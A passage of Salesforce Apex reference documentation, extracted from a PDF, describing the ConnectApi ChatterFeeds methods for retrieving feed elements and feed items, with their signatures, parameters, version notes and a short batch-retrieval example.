Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestGetFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
606
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, Boolean showInternalOnly)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
607
Reference
ChatterFeeds Class
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
showInternalOnly
Type: Boolean
Specifies whether to show only feed items from internal (non-community) users (true), or not (false). The default value is
false.
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestGetFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, Boolean, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount, Integer
elementsPerBundle, ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, Boolean showInternalOnly)
608
Reference
ChatterFeeds Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
showInternalOnly
Type: Boolean
Specifies whether to show only feed items from internal (non-community) users (true), or not (false). The default value is
false.
609
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestGetFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, Boolean, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount, Integer
elementsPerBundle, ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam, Boolean showInternalOnly, ConnectApi.FeedFilter
filter)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
610
Reference
ChatterFeeds Class
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
showInternalOnly
Type: Boolean
Specifies whether to show only feed items from internal (non-community) users (true), or not (false). The default value is
false.
filter
Type: ConnectApi.FeedFilter
Specifies the feed filters.
AllQuestionsOnly feed elements that are questions.
SolvedQuestionsOnly feed elements that are questions and that have a best answer.
UnansweredQuestionsOnly feed elements that are questions and that dont have any answers.
UnsolvedQuestionsOnly feed elements that are questions and that dont have a best answer.
611
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestGetFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, Boolean, ConnectApi.FeedFilter, ConnectApi.FeedElementPage)
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromFilterFeed(String
communityId, String subjectId, String keyPrefix)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
Return Value
Type: ConnectApi.FeedElementPage
612
Reference
ChatterFeeds Class
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetFeedElementsFromFilterFeed(String, String, String, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromFilterFeed(String
communityId, String subjectId, String keyPrefix, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
613
Reference
ChatterFeeds Class
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedElementPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetFeedElementsFromFilterFeed(String, String, String, String, Integer, ConnectApi.FeedSortOrder, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromFilterFeed(String
communityId, String subjectId, String keyPrefix, Integer recentCommentCount, Integer
elementsPerBundle, ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
614
Reference
ChatterFeeds Class
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedElementPage
615
Reference
ChatterFeeds Class
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetFeedElementsFromFilterFeed(String, String, String, Integer, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsFromFilterFeedUpdatedSince(String
communityId, String subjectId, String keyPrefix, Integer recentCommentCount, Integer
elementsPerClump, ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
String updatedSince)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
keyPrefix
Type: String
A key prefix that specifies record type. A key prefix is the first three characters in the object ID, which specifies the object type. For
example, User objects have a prefix of 005 and Group objects have a prefix of 0F9.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
616
Reference
ChatterFeeds Class
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token defining the modification time stamp of the feed and the sort order.
Return Value
Type: ConnectApi.FeedElementPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetFeedElementsFromFilterFeedUpdatedSince(String, String, String, Integer, Integer, ConnectApi.FeedDensity, String, Integer,
String, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
617
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, String updatedSince)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedElementPage response body.
618
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestGetFeedElementsUpdatedSince(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, String,
ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
32.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, String updatedSince, ConnectApi.FeedFilter filter)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
619
Reference
ChatterFeeds Class
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedElementPage response body.
filter
Type: ConnectApi.FeedFilter
Specifies the feed filters.
AllQuestionsOnly feed elements that are questions.
SolvedQuestionsOnly feed elements that are questions and that have a best answer.
UnansweredQuestionsOnly feed elements that are questions and that dont have any answers.
UnsolvedQuestionsOnly feed elements that are questions and that dont have a best answer.
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestGetFeedElementsUpdatedSince(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer, String,
ConnectApi.FeedFilter, ConnectApi.FeedElementPage)
API Version
31.0
620
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize, String updatedSince)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
If feedType is ConnectApi.Record, subjectId can be any record ID, including a group ID. Otherwise, it must be the
context user or the alias me.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
621
Reference
ChatterFeeds Class
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedElementPage response body.
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestGetFeedElementsUpdatedSince(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer, String,
ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize, String updatedSince,
Boolean showInternalOnly)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
622
Reference
ChatterFeeds Class
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedElementPage response body.
showInternalOnly
Type: Boolean
Specifies whether to show only feed elements from internal (non-community) users (true), or not (false). The default value is
false.
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestGetFeedElementsUpdatedSince(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedDensity, String, Integer, String,
Boolean, ConnectApi.FeedElementPage)
Testing ConnectApi Code
623
Reference
ChatterFeeds Class
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElementsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount, Integer
elementsPerClump, ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
String updatedSince, Boolean showInternalOnly)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
density
Type: ConnectApi.FeedDensity
624
Reference
ChatterFeeds Class
AllUpdatesDisplays all updates from people and records the user follows and groups the user is a member of.
FewerUpdatesDisplays all updates from people and records the user follows and groups the user is a member of, but
hides some system-generated updates from records.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedElementPage response body.
showInternalOnly
Type: Boolean
Specifies whether to show only feed elements from internal (non-community) users (true), or not (false). The default value is
false.
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestGetFeedElementsUpdatedSince(String, ConnectApi.FeedType, String, Integer, Integer, ConnectApi.FeedDensity, String, Integer,
String, Boolean, ConnectApi.FeedElementPage)
Testing ConnectApi Code
API Version
32.0
Requires Chatter
Yes
625
Reference
ChatterFeeds Class
Signature
public static ConnectApi.FeedElementPage getFeedElementsUpdatedSince(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount, Integer
elementsPerClump, ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
String updatedSince, Boolean showInternalOnly, ConnectApi.FeedFilter filter)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
Type: String
Any record ID, including a group ID.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
updatedSince
Type: String
An opaque token containing information about the last modified date of the feed. Do not construct this token. Retrieve this token
from the updatesToken property of the ConnectApi.FeedElementPage response body.
showInternalOnly
Type: Boolean
626
Reference
ChatterFeeds Class
Specifies whether to show only feed elements from internal (non-community) users (true), or not (false). The default value is
false.
filter
Type: ConnectApi.FeedFilter
Specifies the feed filters.
AllQuestionsOnly feed elements that are questions.
SolvedQuestionsOnly feed elements that are questions and that have a best answer.
UnansweredQuestionsOnly feed elements that are questions and that dont have any answers.
UnsolvedQuestionsOnly feed elements that are questions and that dont have a best answer.
Return Value
Type: ConnectApi.FeedElementPage
SEE ALSO:
setTestGetFeedElementsUpdatedSince(String, ConnectApi.FeedType, String, Integer, Integer, ConnectApi.FeedDensity, String, Integer,
String, Boolean, ConnectApi.FeedFilter, ConnectApi.FeedElementPage)
getFeedItem(String, String)
Returns a rich description of the specified feed item.
API Version
28.031.0
Important: In version 32.0 and later, use getFeedElement(String, String).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItem getFeedItem(String communityId, String feedItemId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemId
Type: String
627
Reference
ChatterFeeds Class
Return Value
Type: ConnectApi.FeedItem
Note: Triggers on FeedItem objects run before their attachment and capabilities information is saved, which means that
ConnectApi.FeedItem.attachment information and ConnectApi.FeedElement.capabilities information
may not be available in the trigger.
getFeedItemBatch(String, List<String>)
Returns information about the specified list of feed items. Returns a list of BatchResult objects containing
ConnectApi.FeedItem objects. Errors for feed items that can't be loaded are returned in the results.
API Version
31.031.0
Important: In version 32.0 and later, use getFeedElementBatch(String, List<String>).
Requires Chatter
Yes
Signature
public static ConnectApi.BatchResult[] getFeedItemBatch(String communityId, List<String>
feedItemIds)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedItemIds
Type: List<String>
A list of up to 500 feed item IDs.
Return Value
Type: ConnectApi.BatchResult[]
The ConnectApi.BatchResult.getResult() method returns a ConnectApi.FeedItem object.
Example
// Create a list of feed items.
ConnectApi.FeedItemPage feedItemPage = ConnectApi.ChatterFeeds.getFeedItemsFromFeed(null,
ConnectApi.FeedType.Company);
628
Reference
ChatterFeeds Class
System.debug(feedItemPage);
// Create a list of feed item IDs.
List<String> feedItemIds = new List<String>();
for (ConnectApi.FeedItem aFeedItem : feedItemPage.items){
feedItemIds.add(aFeedItem.id);
}
// Get info about the feed items in the list.
ConnectApi.BatchResult[] batchResults = ConnectApi.ChatterFeeds.getFeedItemBatch(null,
feedItemIds);
for (ConnectApi.BatchResult batchResult : batchResults) {
if (batchResult.isSuccess()) {
// Operation was successful.
// Print the header for each feed item.
ConnectApi.FeedItem aFeedItem;
if(batchResult.getResult() instanceof ConnectApi.FeedItem) {
aFeedItem = (ConnectApi.FeedItem) batchResult.getResult();
}
System.debug('SUCCESS');
System.debug(aFeedItem.header.text);
}
else {
// Operation failed. Print errors.
System.debug('FAILURE');
System.debug(batchResult.getErrorMessage());
}
}
getFeedItemsFromFeed(String, ConnectApi.FeedType)
Returns the first page of feed items for the Company, Home, and Moderation feed types. The page contains the default number
of items.
API Version
28.031.0
Important: In version 32.0 and later, use getFeedElementsFromFeed(String, ConnectApi.FeedType).
Requires Chatter
Yes
629
Reference
ChatterFeeds Class
Signature
public static ConnectApi.FeedItemPage getFeedItemsFromFeed(String communityId,
ConnectApi.FeedType feedType)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
Return Value
Type: ConnectApi.FeedItemPage
Usage
When invoked during a test with the matching setTestGetFeedItemsFromFeed method, returns the feed item page passed
in with that method. You must use the test method with the same parameters, or you receive an exception.
SEE ALSO:
setTestGetFeedItemsFromFeed(String, ConnectApi.FeedType, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
28.031.0
Important: In version 32.0 and later, use getFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer,
ConnectApi.FeedSortOrder).
Requires Chatter
Yes
630
Reference
ChatterFeeds Class
Signature
public static ConnectApi.FeedItemPage getFeedItemsFromFeed(String communityId,
ConnectApi.FeedType feedType, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedItemPage
Usage
When invoked during a test with the matching setTestGetFeedItemsFromFeed method, returns the feed item page passed
in with that method. You must use the test method with the same parameters, or you receive an exception.
SEE ALSO:
setTestGetFeedItemsFromFeed(String, ConnectApi.FeedType, String, Integer, ConnectApi.FeedSortOrder, ConnectApi.FeedItemPage)
Testing ConnectApi Code
631
Reference
ChatterFeeds Class
API Version
29.031.0
Important: In version 32.0 and later, use getFeedElementsFromFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity,
String, Integer, ConnectApi.FeedSortOrder).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage getFeedItemsFromFeed(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity density,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values are Company, Home, and Moderation.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
632
Reference
ChatterFeeds Class
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedItemPage
Usage
When invoked during a test with the matching setTestGetFeedItemsFromFeed method, returns the feed item page passed
in with that method. You must use the test method with the same parameters, or you receive an exception.
SEE ALSO:
setTestGetFeedItemsFromFeed(String, ConnectApi.FeedType, Integer, ConnectApi.FeedDensity, String, Integer,
ConnectApi.FeedSortOrder, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
28.031.0
Important: In version 32.0 and later, use getFeedElementsFromFeed(String, ConnectApi.FeedType, String).
Requires Chatter
Yes
633
Reference
ChatterFeeds Class
Signature
public static ConnectApi.FeedItemPage getFeedItemsFromFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
Return Value
Type: ConnectApi.FeedItemPage
Usage
When invoked during a test with the matching setTestGetFeedItemsFromFeed method, returns the feed item page passed
in with that method. You must use the test method with the same parameters, or you receive an exception.
SEE ALSO:
setTestGetFeedItemsFromFeed(String, ConnectApi.FeedType, String, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
28.031.0
Important: In version 32.0 and later, use getFeedElementsFromFeed(String, ConnectApi.FeedType, String, String, Integer,
ConnectApi.FeedSortOrder).
634
Reference
ChatterFeeds Class
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage getFeedItemsFromFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
The page contains the default number of items.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedItemPage
635
Reference
ChatterFeeds Class
Usage
When invoked during a test with the matching setTestGetFeedItemsFromFeed method, returns the feed item page passed
in with that method. You must use the test method with the same parameters, or you receive an exception.
SEE ALSO:
setTestGetFeedItemsFromFeed(String, ConnectApi.FeedType, String, String, Integer, ConnectApi.FeedSortOrder,
ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
29.031.0
Important: In version 32.0 and later, use getFeedElementsFromFeed(String, ConnectApi.FeedType, String, Integer,
ConnectApi.FeedDensity, String, Integer, ConnectApi.FeedSortOrder).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage getFeedItemsFromFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
feedType
Type: ConnectApi.FeedType
The type of feed. Valid values include every ConnectApi.FeedType except Company, Filter, Home, and Moderation.
subjectId
Type: String
636
Reference
ChatterFeeds Class
If feedType is Record, subjectId can be any record ID, including a group ID. If feedType is Topics, subjectId
must be a topic ID. If feedType is UserProfile, subjectId can be any user ID. If the feedType is any other value,
subjectId must be the ID of the context user or the alias me.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
density
Type: ConnectApi.FeedDensity
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedItemPage
Usage
When invoked during a test with the matching setTestGetFeedItemsFromFeed method, returns the feed item page passed
in with that method. You must use the test method with the same parameters, or you receive an exception.
SEE ALSO:
